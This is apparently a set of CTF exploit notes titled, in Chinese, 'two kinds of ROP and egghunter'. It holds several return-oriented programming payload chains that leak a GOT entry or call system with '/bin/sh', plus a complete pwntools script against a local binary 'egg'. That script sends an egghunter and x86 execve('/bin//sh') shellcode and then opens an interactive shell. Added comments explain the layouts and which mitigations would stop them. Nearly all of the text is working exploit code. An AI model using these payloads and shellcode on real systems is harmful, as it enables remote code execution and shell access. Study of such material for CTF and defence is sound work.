两种 ROP 与 egghunter


# x86-64 chain (p64 = 8-byte packing): 24 bytes of filler, then a pop-rdi gadget
# whose argument is read's GOT entry, puts via the PLT, and evil_addr as the next
# return address. Relies on fixed gadget/PLT addresses (no PIE); a stack canary
# between the buffer and the saved return address would stop this layout.
payload = 'A' * 24 + p64(pop_rdi_ret) + p64(read_got) + p64(puts_plt) + p64(evil_addr)

 # 32-bit-style layout: the literal prefix "http://%\0A" (the \0 is a NUL byte,
 # presumably what the target's parser expects), 148 bytes of filler, system_addr,
 # 4 bytes of fake return address, then binsh_addr. There is no p32() call here, so
 # system_addr and binsh_addr must already be packed 4-byte strings.
 payload = "http://%\0A" + 'A'*(156-8) + system_addr + 'AAAA'+ binsh_addr


# Bare expression -- its value is not assigned or sent anywhere on this page.
# 32-bit-style layout: puts via the PLT, 4 bytes of fake return address, then
# puts' own GOT entry as the argument; operands assumed to be packed strings.
puts_plt + 'A'*4 + puts_got

# x86-64 chain (p64): 24 bytes of filler, a pop-rdi gadget with sh_addr as its
# argument, then system_addr as the return target. Same fixed-address (no PIE)
# assumption as the other p64 chain on this page.
payload = 'A' * 24 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)


# Every offset of the NUL-terminated string '/bin/sh' inside the libc ELF;
# pwntools' ELF.search() yields lazily, list() materialises the results.
sh_libc = list(libc.search('/bin/sh\x00'))

"""Exploit script for the local CTF binary ``egg`` (Python 2: ``print`` statement).

Flow as written: connect, read two addresses that the service prints on its own
output, build a 20-byte input from hard-coded machine code plus those addresses,
then send a second hard-coded machine-code string and hand the session over.
Note for defenders: the service printing ``chunk_addr``/``stack_addr`` in its
banner is what makes fixed, unguessed addresses available here; not leaking them
(and NX on the memory the inputs land in) breaks this script as written.
"""
from pwn import *
# init
debug = 0
if debug:
    io = process('./egg')          # local process when debugging
else:
    io = remote('127.0.0.1',2334)  # otherwise a service on localhost:2334
context.log_level = 'debug'         # pwntools logs every byte sent and received
if debug:
    # attach gdb to the last matching pid, with the command file 'zp';
    # the open() handle is never closed (harmless for a one-shot script)
    gdb.attach(pidof('egg')[-1],open('zp'))
#----------------------------------------------------------------
# hard-coded machine code, sent as the final input below; running it requires the
# memory it lands in to be executable (NX/DEP defeats this step)
shellcode = '\x90\x50\x90\x50'+"\x90\x90\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\x90\x90"
jmp_esp = 0x0804885f  # assigned but not used anywhere below
io.recvuntil('Your party seat is')
chunk_addr = int(io.recvuntil('\n'),16)  # first address the service prints (hex)
print 'chunk_addr = '+ hex(chunk_addr)
io.recvuntil('trick?')
io.sendline('treat')
io.recvuntil('located in ')
stack_addr = int(io.recvuntil('\n'),16)  # second address the service prints (hex)
print 'stack_addr = '+ hex(stack_addr)
io.recvuntil('your name?')
# hard-coded machine code with chunk_addr embedded (p32 packs it as 4 bytes)
egg_hunter = "\xb8" + p32(chunk_addr) + "\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75\xfb\xff\xe0\x01"
# pad to 20 bytes, then stack_addr; egg_hunter is 19 bytes, so the padding is one 'A'
payload = egg_hunter + 'A'*(20-len(egg_hunter)) + p32(stack_addr)
io.sendline(payload)
io.recvuntil('sweets here.')
io.sendline(shellcode)
io.interactive()
```


